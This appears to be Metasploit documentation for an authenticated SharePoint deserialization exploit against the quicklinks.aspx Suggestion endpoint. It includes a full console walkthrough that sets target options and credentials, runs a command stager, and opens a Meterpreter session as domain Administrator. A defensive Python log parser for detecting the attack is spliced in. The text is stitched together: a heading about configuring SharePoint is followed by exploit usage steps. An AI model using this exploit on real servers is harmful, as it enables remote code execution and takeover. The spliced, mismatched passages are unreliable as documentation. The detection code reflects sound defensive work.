documentation/modules/exploit/windows/http/sharepoint_data_deserialization.md
A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker
to execute code within the context of the SharePoint application service. The privileges in this execution context are
determined by the account that is specified when SharePoint is installed and configured. The vulnerability is related to
a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered
from a page that initializes either the ContactLinksSuggestionsMicroView type or a derivative of it. In a default
configuration, a Domain User account is sufficient to access SharePoint and exploit this vulnerability.
This module leverages the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint, which Soroush Dalili confirmed to be
vulnerable. Alternative endpoints that instantiate the ContactLinksSuggestionsMicroView type may be used as well, but
they are not supported by the module.
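Since the module has to hit the quicklinks endpoint with a POST from an authenticated domain account, the IIS W3C log of the SharePoint web application records every attempt. The following added example (not part of the module or its documentation) parses a constructed IIS log and flags requests to that endpoint in Suggestion mode; the field layout, timestamps and client addresses are assumptions, while the hostnames and user names are taken from the session below.

```python
"""Flag IIS W3C log entries that hit the SharePoint quicklinks.aspx Suggestion
endpoint used by the module described above. The log below is constructed."""
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended format (IIS logs in UTC, so 15:44 here
# corresponds to the 11:44 -0400 session on this page). Not real traffic.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2020-07-29 15:44:50 192.168.63.168 GET /_layouts/15/quicklinks.aspx Mode=Suggestion 80 SHRPNT\\smcintyre 192.168.63.1 200
2020-07-29 15:44:52 192.168.63.168 POST /_layouts/15/quicklinks.aspx Mode=Suggestion 80 SHRPNT\\smcintyre 192.168.63.1 200
2020-07-29 15:45:01 192.168.63.168 GET /sites/team/SitePages/Home.aspx - 80 SHRPNT\\alice 192.168.63.20 200
2020-07-29 15:45:07 192.168.63.168 GET /_layouts/15/quicklinks.aspx - 80 SHRPNT\\alice 192.168.63.20 200
"""

TARGET_STEM = "/_layouts/15/quicklinks.aspx"


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def find_suggestion_requests(text):
    """Return (method, user, client_ip, time) for every request to the
    Suggestion mode of quicklinks.aspx, regardless of HTTP method."""
    hits = []
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"].lower() != TARGET_STEM:
            continue
        # IIS writes the raw query string; parse_qs handles percent-decoding.
        query = {k.lower(): v for k, v in parse_qs(rec["cs-uri-query"]).items()}
        modes = [m.lower() for m in query.get("mode", [])]
        if "suggestion" in modes:
            hits.append((rec["cs-method"], rec["cs-username"], rec["c-ip"], rec["time"]))
    return hits


def exploitation_candidates(text):
    """Keep only the POSTs: loading the form is a GET, while the payload is
    submitted in the POST body, so POSTs are the entries worth escalating."""
    return [h for h in find_suggestion_requests(text) if h[0] == "POST"]
```

Correlating the flagged POST with a new process spawned by the SharePoint application pool worker (w3wp.exe) for that site shortly afterwards gives the confirming signal.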
Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central Administration web interface is not vulnerable. To configure SharePoint as a stand-alone server:
1. Run `use exploit/windows/http/sharepoint_data_deserialization`
2. Set the RHOSTS, USERNAME, PASSWORD and PAYLOAD options
3. Set the VHOST, SSL and DOMAIN options as appropriate

```
msf > use exploit/windows/http/sharepoint_data_deserialization
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
RHOSTS => 192.168.63.168
msf exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
RPORT => 80
msf exploit(windows/http/sharepoint_data_deserialization) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
VHOST => ec2amaz-v2pri0v
msf exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
USERNAME => smcintyre
msf exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
PASSWORD => Password1
msf exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
DOMAIN => SHRPNT
msf exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(windows/http/sharepoint_data_deserialization) > check
[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
msf exploit(windows/http/sharepoint_data_deserialization) > exploit
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Received the quicklinks HTML form.
[*] Command Stager progress - 7.42% done (7499/101079 bytes)
[*] Command Stager progress - 14.84% done (14998/101079 bytes)
[*] Command Stager progress - 22.26% done (22497/101079 bytes)
[*] Command Stager progress - 29.68% done (29996/101079 bytes)
[*] Command Stager progress - 37.09% done (37495/101079 bytes)
[*] Command Stager progress - 44.51% done (44994/101079 bytes)
[*] Command Stager progress - 51.93% done (52493/101079 bytes)
[*] Command Stager progress - 59.35% done (59992/101079 bytes)
[*] Command Stager progress - 66.77% done (67491/101079 bytes)
[*] Command Stager progress - 74.19% done (74990/101079 bytes)
[*] Command Stager progress - 81.61% done (82489/101079 bytes)
[*] Command Stager progress - 89.03% done (89988/101079 bytes)
[*] Command Stager progress - 96.45% done (97487/101079 bytes)
[*] Command Stager progress - 100.00% done (101079/101079 bytes)
[*] Started bind TCP handler against 192.168.63.168:4444
[*] Sending stage (176195 bytes) to 192.168.63.168
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400
meterpreter > sysinfo
Computer        : EC2AMAZ-V2PRI0V
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 19
Meterpreter     : x86/windows
meterpreter > getuid
Server username: SHRPNT\Administrator
meterpreter >
```